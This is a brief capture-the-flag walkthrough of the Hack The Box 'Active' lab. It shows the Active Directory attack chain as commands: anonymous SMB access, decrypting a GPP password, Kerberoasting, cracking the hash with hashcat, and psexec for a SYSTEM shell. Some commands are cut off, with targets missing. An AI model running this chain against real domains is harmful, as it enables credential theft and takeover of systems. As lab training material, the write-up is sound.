HTB: Active Walkthru


Active Directory Maschine


First of all perform nmap-scan

nmap -T5

SMB 445 is open, lets check if we can login with anonymous-login

smbclient -L \\\\\\

Works! Lets login to the directory that we saw

smbclient \\\\\\Replication

Download all files, and check them locally

mget *

We found some information in the Groups.xml. Lets try to decrypt the hash.

gpp-decrypt HASH

Looks like we found a service-account, in some cases the service accounts are setup as administrator accounts, which is bad practise.
Maybe we can get along with a Kerberoasting-Attack active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip -request

And we get a ticket back, lets try to crack the hash with hashcat

hashcat -m 13100 ../hashlist.txt ~/rockyou.txt -O

No after we got the password we can try an attack with psexec to get an admin-shell active.htb/administrator:[email protected]

Now we are system-user and can access the desktops of the users to get the flags.

Leave a reply

Your email address will not be published. Required fields are marked *